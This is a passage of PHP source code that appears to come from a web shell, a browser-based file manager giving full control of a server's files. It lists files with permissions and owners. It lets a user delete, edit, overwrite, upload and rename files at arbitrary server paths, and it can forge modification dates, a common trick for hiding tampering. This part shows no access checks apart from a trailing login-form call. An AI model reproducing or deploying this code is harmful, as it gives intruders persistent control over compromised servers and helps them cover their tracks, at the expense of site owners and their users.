$userinfo = posix_getpwuid(fileowner($file)) ["name"] . "/" . posix_getgrgid(filegroup($file)) ["name"];
if (strlen($path) == 1) {
$file = $path . $file;
} else {
$file = $path . '/' . $file;
}
if (is_link($file)) {
$disppath = readlink($file);
if (strpos($disppath, "/") != 0) {
$disppath = "/" . $disppath;
}
if (is_file(readlink($file))) {
echo "<tr tabindex='0' class='note'><td class='cbox'>" . "<input type='checkbox' name='choose[]' value='$file'>" . "</td>" . "<td class='col'>➦" . "<input class='openf all' type='submit' name='view' value=" . $fName . ">" . "</td>" . "<td>" . "<input style='border: 1px solid #cccccc;' name='del' value='D' type='submit' title='Delete'>" . "<input style='border: 1px solid #cccccc;' name='ren' value='R' type='submit' title='Rename'>" . "<input style='border: 1px solid #cccccc;' name='tou' value='T' type='submit' title='Touch'>" . "<td>" . "[" . numPerms($file) . "] " . printPerms($file) . "</td>" . "<td>" . $userinfo . "</td>" . "<td>" . date('d-m-Y H:i:s', filemtime($file)) . "</td>" . "<td>LINK</td></tr>";
} else {
echo "<tr tabindex='0' class='note'><td class='cbox'>" . "<input type='checkbox' name='choose[]' value='$file'>" . "</td>" . "<td class='col'>➦<a href='" . $_SERVER['PHP_SELF'] . "?path=$disppath'>$fName</a> </td>" . "<td>" . "<input style='border: 1px solid #cccccc;' name='del' value='D' type='submit' title='Delete'>" . "<input style='border: 1px solid #cccccc;' name='ren' value='R' type='submit' title='Rename'>" . "<input style='border: 1px solid #cccccc;' name='tou' value='T' type='submit' title='Touch'>" . "<td>" . "[" . numPerms($file) . "] " . printPerms($file) . "</td>" . "<td>" . $userinfo . "</td>" . "<td>" . date('d-m-Y H:i:s', filemtime($file)) . "</td>" . "<td>LINK</td></tr>";
}
} elseif (is_file($file)) {
$endsize = "";
$fullsize = filesize($file);
if ($fullsize < 1024) {
$endsize = "B";
} elseif ($fullsize < 1048576) {
$endsize = "KB";
$fullsize/= 1024;
} elseif ($fullsize < 1073741824) {
$endsize = "MB";
$fullsize/= 1048576;
}
echo "<tr tabindex='0' class='note'><td class='cbox'>" . "<input type='checkbox' name='choose[]' value='$file'>" . "</td>" . "<td class='col'><img src='' /> " . "<input class='openf all' type='submit' name='view' value=" . $fName . ">" . "</td>" . "<td>" . "<input style='border: 1px solid #cccccc;' name='del' value='D' type='submit' title='Delete'>" . "<input style='border: 1px solid #cccccc;' name='ren' value='R' type='submit' title='Rename'>" . "<input style='border: 1px solid #cccccc;' name='tou' value='T' type='submit' title='Touch'>" . "<input style='border: 1px solid #cccccc;' name='edit' value='E' type='submit' title='Edit'>" . "<input style='border: 1px solid #cccccc;font-size: 14px;padding-left: 6px;padding-right: 6px;' name='load' value='⬇' type='submit' title='Download'>" . "</td>" . "<td>" . "[" . numPerms($file) . "] " . printPerms($file) . "<td>" . $userinfo . "</td>" . "<td>" . date('d-m-Y H:i:s', filemtime($file)) . "</td>" . "<td>" . round($fullsize, 2) . " " . $endsize . "</td></tr>";
} elseif (is_dir($file)) {
echo "<tr tabindex='0' class='note'><td class='cbox'>" . "<input type='checkbox' name='choose[]' value='$file'>" . "</td>" . "<td class='col'><img src='' /> <a href='" . $_SERVER['PHP_SELF'] . "?path=$file'>$fName</a></td>" . "<td>" . "<input style='border: 1px solid #cccccc;' name='del' value='D' type='submit' title='Delete'>" . "<input style='border: 1px solid #cccccc;' name='ren' value='R' type='submit' title='Rename'>" . "<input style='border: 1px solid #cccccc;' name='tou' value='T' type='submit' title='Touch'>" . "<input style='border: 1px solid #cccccc;padding: 0 7px;' name='up' value='U' type='submit' title='Upload'>" . "</td>" . "<td>" . "[" . numPerms($file) . "] " . printPerms($file) . "<td>" . $userinfo . "</td>" . "<td>" . date('d-m-Y H:i:s', filemtime($file)) . "</td>" . "<td>DIR</td></tr>";
}
}
}
echo "</table></form></div></div>";
}
echo showContent($actpath);
function removeDirectory($dir) {
if ($objs = glob($dir . "/*")) {
foreach ($objs as $obj) {
is_dir($obj) ? removeDirectory($obj) : unlink($obj);
}
}
return rmdir($dir);
}
$modal = '
<div id="openModal" class="modalbackground">
<div class="modalwindow">
<p>text</p>
<a href="">Close</a>
</div>
</div>';
if (isset($_POST['del'])) {
if (!empty($_POST['choose'])) {
foreach ($_POST['choose'] as $value) {
if (is_link($value)) {
if (unlink($value)) {
echo str_replace("text", '<p class="pm">' . "The link was successfully deleted!" . '</p>', $modal);
} else {
echo str_replace("text", '<p class="pm">' . "Error! The link was not deleted!" . '</p>', $modal);
}
} elseif (is_file($value)) {
if (unlink($value)) {
echo str_replace("text", '<p class="pm">' . "The file was successfully deleted!" . '</p>', $modal);
} else {
echo str_replace("text", '<p class="pm">' . "Error! The file was not deleted!" . '</p>', $modal);
}
} elseif (is_dir($value)) {
if (removeDirectory($value)) {
echo str_replace("text", '<p class="pm">' . "Directory deleted!" . '</p>', $modal);
} else {
echo str_replace("text", '<p class="pm">' . "Error! The directory was not deleted!" . '</p>', $modal);
}
}
}
}
}
if (isset($_POST['edit'])) {
if (!empty($_POST['choose'])) {
$val = $_POST['choose'][0];
if (is_readable($val)) {
$formedit = "
<div id='openModal' class='modalbackground'><div class='modalwindow2'><form style='width: 96%;height: 85%;margin: 0 auto;' method='post'>
<textarea style='resize: none;width: 98%;height: 98%;' name='edit_code'>" . htmlspecialchars(file_get_contents($val)) . "</textarea><input type='hidden' name='correction' value='" . $_POST['choose'][0] . "'><input style='float:left;margin-left: 1%;margin-top: 8px;' type='submit' value='Apply the changes'></form><a href=''>Close</a></div></div>";
echo $formedit;
} else {
echo str_replace("text", '<p class="pm">' . "Error! Can't open file!" . '</p>', $modal);
}
}
}
if (isset($_POST['edit_code'])) {
$result = file_put_contents($_POST['correction'], $_POST['edit_code']);
if ($result === FALSE) {
echo str_replace("text", '<p class="pm">' . "Error writing to file!" . '</p>', $modal);
} else {
echo str_replace("text", '<p class="pm">' . "The file was successfully modified!" . '</p>', $modal);
}
}
if (isset($_POST['view'])) {
if (is_readable($_POST['view'])) {
$doc = fopen($_POST['view'], "rt");
$contents = '';
while (!feof($doc)) $contents.= fread($doc, 4096);
fclose($doc);
if (filesize($_POST['view']) == 0) {
echo str_replace("text", '<p class="pm">' . "The file is empty!" . '</p>', $modal);
} elseif ($contents) {
echo '<div id="openModal" class="modalbackground">' . '<div class="modalwindow2">' . "<div class='area'>";
highlight_string($contents);
echo "</div>" . '<a href="">Close</a>' . "</div>" . "</div>";
}
} else {
echo str_replace("text", '<p class="pm">' . "Error! Can't open file!" . '</p>', $modal);
}
}
if (isset($_POST['up']) && !empty($_POST['choose'])) {
echo '<div id="openModal" class="modalbackground">' . '<div class="modalwindow">' . "<div style='width: auto;' class='area'>";
echo '<p style="margin-left:5px;text-align: left;">' . "upload_max_filesize: " . ini_get("upload_max_filesize") . "<br>" . "post_max_size: " . ini_get("post_max_size") . '</p>';
echo '
<pre>
<form method="POST" enctype="multipart/form-data">
<label><b class="bt">Uploader:</b></label>
<input type="file" name="filename" ><br/>
<input type="hidden" name="up_file" value="' . $_POST['choose'][0] . '">
<input type="submit" value="Upload">
</form>
<pre>';
echo "</div>" . '<a href="">Close</a>' . "</div>" . "</div>";
}
if ($_FILES['filename']['error'] == UPLOAD_ERR_OK) {
$name = $_POST['up_file'] . '/' . $_FILES['filename']['name'];
if (move_uploaded_file($_FILES['filename']['tmp_name'], $name)) {
$text = '<p class="pm">' . "The file was uploaded successfully!" . '</p>';
$newphrase = str_replace("text", $text, $modal);
echo $newphrase;
}
} else {
echo str_replace("text", '<p class="pm">' . "Error! The file is not selected!" . '</p>', $modal);
}
if (isset($_POST['tou']) && !empty($_POST['choose'])) {
echo '<div id="openModal" class="modalbackground">' . '<div class="modalwindow">' . "<div style='width: auto;' class='area'>";
echo "
<form method='post'>
<textarea style='resize: none;' name='code'>" . date('d-m-Y H:i:s', filemtime($_POST['choose'][0])) . "</textarea>
<input type='hidden' name='date_file' value='" . $_POST['choose'][0] . "'><br/>
<input type='submit' value='Touch'>
</form>";
echo "</div>" . '<a href="">Close</a>' . "</div>" . "</div>";
}
if (isset($_POST['code'])) {
if (touch($_POST['date_file'], strtotime($_POST['code']))) {
$text = '<p class="pm">' . "Modification date changed!" . '</p>';
$newphrase = str_replace("text", $text, $modal);
echo $newphrase;
} else {
echo str_replace("text", '<p class="pm">' . "Error! You couldn't change the date!" . '</p>', $modal);
}
}
if (isset($_POST['ren']) && !empty($_POST['choose'])) {
echo '<div id="openModal" class="modalbackground">' . '<div class="modalwindow">' . "<div style='width: auto;' class='area'>";
echo "
<form method='post'>
<textarea style='resize: none;' name='r_code'>" . $_POST['choose'][0] . "</textarea>
<input type='hidden' name='ren_file' value='" . $_POST['choose'][0] . "'><br/>
<input type='submit' value='Rename'>
</form>";
echo "</div>" . '<a href="">Close</a>' . "</div>" . "</div>";
}
if (isset($_POST['r_code'])) {
if (rename($_POST['ren_file'], $_POST['r_code'])) {
echo str_replace("text", '<p class="pm">' . "Renaming completed!" . '</p>', $modal);
} else {
echo str_replace("text", '<p class="pm">' . "Error! Not renamed!" . '</p>', $modal);
}
}
echo '</div></div>';
} else echo showForm();
?>
</body>
</html>